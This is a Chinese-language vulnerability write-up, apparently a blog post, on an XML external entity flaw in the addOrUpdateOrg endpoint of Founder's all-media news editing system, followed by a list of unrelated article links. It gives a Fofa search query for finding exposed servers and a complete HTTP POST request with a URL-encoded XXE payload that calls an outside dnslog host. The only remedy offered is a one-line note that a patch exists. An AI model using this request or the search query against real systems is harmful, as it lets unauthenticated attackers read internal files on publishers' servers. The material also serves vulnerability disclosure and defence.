方正畅享全媒体新闻采编系统 addOrUpdateOrg xxe漏洞

0x01 产品描述:

方正畅享全媒体新闻采编系统是一个集指挥中心、采集中心、编辑中心、发布中心、绩效考核中心和资料中心为一体的全媒体新闻采编系统‌,主要应用于媒体行业的深度融合,通过大数据和AI技术,实现新闻生产的策、采、编、发、存、传、评的全流程管理‌

0x02 漏洞描述:

方正畅享全媒体新闻采编系统 addOrUpdateOrg 接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
0x03 搜索语句:

Fofa:app="FOUNDER-全媒体采编系统"

0x04 漏洞复现:

复制代码
POST /newsedit/api/orgUser/addOrUpdateOrg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close

xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http://gli10h.dnslog.cn/%22%3E%20%25remote;%5D%3E

0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
securitypaper1 小时前
2026年最新发布的 安全生产 行业标准 列表 下载
大数据·安全
枷锁—sha2 小时前
【BUUCTF系列】helloworld 1
安全·网络安全
月明长歌2 小时前
Javasynchronized 原理拆解:锁升级链路 + JVM 优化 + CAS 与 ABA 问题(完整整合版)
java·开发语言·jvm·安全·设计模式
zhengfei6112 小时前
【Slack 安全工具箱】—— 多维度一体化安全管理平台
网络·安全·web安全
潇凝子潇2 小时前
Kafka 实现集群安全认证与加密机制
分布式·安全·kafka
菩提小狗3 小时前
sqlmap输入命令回车自动退出故障排查
笔记·安全·web安全
●VON3 小时前
绿色 AI:让智能计算与地球共生
人工智能·学习·安全·制造·von
军哥系统集成号3 小时前
2026网络安全法修订落地:企业六类法定强制评估合规指南(附协同实施路径)
网络·安全·web安全
幽络源小助理3 小时前
逆向工程系统学习资源图谱(2026):从 Windows 内核、安卓安全到游戏协议分析的全栈教程清单
学习·安全·游戏·逆向工程
打不了嗝 ᥬ᭄3 小时前
网易 UU 远程 2026年1月 新春升级深度测评:免登录破局 + 安全加码 + 运维专属,重新定义远程协助体验
运维·安全